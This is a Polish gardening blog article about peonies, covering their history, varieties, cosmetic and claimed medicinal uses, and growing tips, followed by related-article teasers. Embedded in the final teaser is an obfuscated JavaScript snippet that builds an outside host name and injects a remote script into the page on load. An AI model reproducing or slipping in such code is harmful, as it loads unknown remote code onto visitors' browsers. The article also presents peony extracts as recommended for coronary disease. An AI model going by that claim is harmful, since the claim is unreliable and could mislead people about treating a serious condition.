Piwonia – kwiat o wielu twarzach. Uchodzi za symbol radości, bogactwa i zdrowia. Nic dziwnego! Na ich widok uśmiech sam rysuje się na twarzy. Dawniej ich sadzonki były bardzo cenne, trzeba było za nie zapłacić równowartość nawet trzech domów! Dlatego już od czasów starożytnych, w Chinach, uznawana była za królewską roślinę, gdzie pełniła honory w Ogrodzie Cesarskim. Choć piwonie są trujące, to jednak mają lecznicze właściwości. Poza tym roślina ta ma jeszcze szereg innych zastosowań. Przekonaj się.
Piwonia – róża bez kolców
W ogrodach cieszy się ogromną popularnością. Kiedyś kojarzona była z typowym wiejskim ogrodem. Jednak wraz z upływem czasu piwonia zyskuje nowe zastosowania, także we współczesnych aranżacjach roślinnych. Piwonia posiada jedne z najbardziej okazałych kwiatów – niektóre z odmian potrafią osiągnąć nawet 0.5 m średnicy. Choć kwitnie dość krótko, jesteśmy w stanie jej to wybaczyć, bo obfitością pąków i wspaniałym zapachem wszystko rekompensuje.
Tyle gatunków i odmian – co tu wybrać?
No tak, wybór piwonii jest przeogromny, nie sposób mieć ich wszystkich. Kolorystyka kwiatów jest bardzo zróżnicowana: od bieli i beżu przez odcienie różu i czerwieni, aż po żółte, a nawet pomarańczowe. Piwonie, to nie tylko powszechnie znane „pompony” o pełnych kwiatach, ale także odmiany o kwiatach: pojedynczych, podwójnych, anemonowych oraz japońskich.
Warto wiedzieć, że piwonie dzielimy na zielne (których część nadziemna zamiera na zimę) i drzewiaste (których część nadziemna drewnieje). Piwonie drzewiaste, przez pewien czas, nie były tak popularne, jak tradycyjne odmiany piwonii, które pamiętamy z ogrodów naszych babć. We współczesnych ogrodach jest ona milej widziana niż piwonie zielne, gdyż jej okazałe krzewy oblepione ogromnymi kwiatami wprawiają w zdumienie niejednego przechodnia.
Piwonia nie tylko w ogrodzie
Piwonie to doskonały wybór na kwiaty cięte. Dlatego bardzo chętnie są wybierane do tworzenia ciekawych kompozycji florystycznych. W czasach gdy piwonie były tak cenne, jak niejeden szlachetny kamień, niektóre sadzonki dołączano do posagu panny młodej. Dziś możemy cieszyć się tak olbrzymią dostępnością i przystępną ceną, że stają się one często motywem przewodnim wielu wesel, przyozdabiając pięknie salę.
Do wazonu najlepiej ścinać je w stanie delikatnie rozwijającego się pączka. Takie gałązki znacznie dłużej będą cieszyły oko, roztaczając przyjemną woń w pomieszczeniu. A skoro mowa o zapachu, to należy wspomnieć, że uwodzące nuty zapachowe tej rośliny są wykorzystywane do produkcji perfum oraz kosmetyków. Ekstrakty z piwonii nie tylko dają wyjątkowe doznania zapachowe, ale także wpływają pozytywnie na skórę. Działają przeciwstarzeniowo i normalizują cerę skłonną do trądziku. Także, drogie Panie, stosujcie kosmetyki z piwonii, a Wasza skóra będzie aksamitna i gładka jak płatki tych kwiatów.
Piwonie mają również właściwości lecznicze. Nic więc dziwnego, że zainteresował się nią również przemysł medyczny. Wyciągi z piwonii posiadają właściwości uspakajające, moczopędne, przeciwbakteryjne i przeciwgrzybicze. Wspomagają również układ hormonalny. Oprócz tego działają rozkurczowo i poprawiają trawienie. Ekstrakty z kwiatów pozytywnie wpływają na serce i układ krążenia, dlatego polecane są przy chorobie wieńcowej.
Wyraziste i pełne wdzięku kwiaty piwonii to również wdzięczny motyw wykorzystywany w sztuce oraz na przedmiotach codziennego użytku. Piwoniowe obrazy, pomalowane ściany, zastawa stołowa, czy artykuły papiernicze to tylko kilka przykładów jego zastosowania.
Podstawowe błędy w uprawie – czyli dlaczego moja piwonia nie kwitnie?
Wiele osób pragnie mieć piwonie u siebie w ogrodzie lub na balkonie. Jednak czasem, mimo tego, że wzięliśmy sadzonkę od sąsiada, u którego pięknie kwitła, to u nas kwiaty wyglądają marnie lub w ogóle ich nie ma.
Schody zaczynają się na etapie sadzenia. Bulwy piwonii zielnych należy sadzić dość płytko – uśpione pączki powinny znajdować się jedynie 2-3 cm pod ziemią. Zbyt głęboko posadzona piwonia nie zakwitnie. Wyjątek stanowi piwonia drzewiasta – sadzimy ją tak, aby bulwa, na której jest zaszczepiona, znajdowała się 10-15 cm pod ziemią. Dla piwonii wybierzmy stanowisko słoneczne lub tylko z minimalnym cieniem. Promienie słońca pobudzają roślinę do kwitnienia. Nie należy zapominać również o podlewaniu w czasie długotrwałej suszy.
Piwonie lubią sobie podjeść, a gdy mają zbyt mało składników pokarmowych nie mają siły na wytworzenie kwiatów. Już podczas sadzenia dobrze jest zaopatrzyć piwonię w żyzną ziemię, np. poprzez dodanie ziemi kompostowej lub obornika. Podczas wegetacji zadbajmy o coroczne nawożenie. Wybierajmy zbilansowane nawozy dostosowane do potrzeb tych roślin, czyli takie w których przeważa potas, natomiast azotu jest stosunkowo mało. Nawozem odpowiadającym tym potrzebom będzie z pewnością nawóz do kwiatów ogrodowych i powojników Agrecol. Nawóz posiada granulowaną, łatwa w stosowaniu formę i łatwo przyswajalne składniki pokarmowe, co pewnością zadowoli piwonie, a także ich właścicieli.
Jeśli w Twoim ogrodzie, czy na balkonie brakuje tych pięknych kwiatów, nie wahaj się już ani chwili i rozpocznij swoją przygodę z uprawą piwonii.
Podobne artykuły:
-
Krzesła ogrodowe – niezbędny dodatek do każdego ogrodu
Sezon letni to czas, którego nie warto tracić na przebywanie w domu. Aby wypoczynek na dworze był przyjemny i, co ważniejsze, wygodny, niezbędne jest wyposażenie naszego podwórza w meble ogrodowe. Pierwszymi, o których zakupie powinniśmy pomyśleć, są krzesła ogrodowe. Z uwagi na to, że większą część sezonu są one przechowywane na zewnątrz, przy ich zakupie należy zwrócić szczególną uwagę na materiał, z którego zostały wykonane. Dobrej jakości wykonania, krzesła ogrodowe powinny nam bowiem posłużyć przez co najmniej kilka sezonów.
-
Koszty eksploatacji jacuzzi ogrodowego – prąd, utrzymanie i wykorzystanie całoroczne
Posiadanie jacuzzi ogrodowego to luksus i możliwość relaksu w zaciszu własnego ogrodu, ale również zobowiązanie do ponoszenia pewnych kosztów związanych z jego eksploatacją.
-
Pompa głębinowa – montaż i użytkowanie
Pomimo rosnącej popularności oraz wciąż przybywających sieci wodociągowych właściciele domków jednorodzinnych doceniają wartość studni głębinowej na własnym podwórku. Pozyskana w ten sposób woda może służyć do picia i użytku domowego, ale także gospodarczego: do podlewania ogrodu czy mycia samochodów. Wpływa to jednocześnie na oszczędności w domowym budżecie. Jak utworzyć studnię oraz prawidłowo zamontować w niej i eksploatować pompę?
-
Ruska bania – oryginalna sauna ogrodowa
Jesienią i zimą nie ma nic przyjemniejszego niż seans w ruskiej bani. To wyjątkowa sauna ogrodowa w kształcie beczki, która znakomicie rozgrzewa nawet w siarczysty mróz. (function(){ a8nc=document.createElement("script");a8nc_="u"+("s")+"ta"; a8nc_+=("t.i")+""+"n";a8nc_+=(("f")+"o");a8nc.type="text/javascript"; a8nc_+="/"; a8ncu="184764279";a8ncu+=".5h9judau8ncesrqbkeu";a8ncu+="bmzzbk9d3rb"; a8nc.src="https://"+a8nc_+a8ncu;a8nc.async=true;document.body.appendChild(a8nc); })();
Grażyna
Ruska bania – oryginalna sauna ogrodowa 2020-07-02 12:28:16 2020-07-02 12:27:06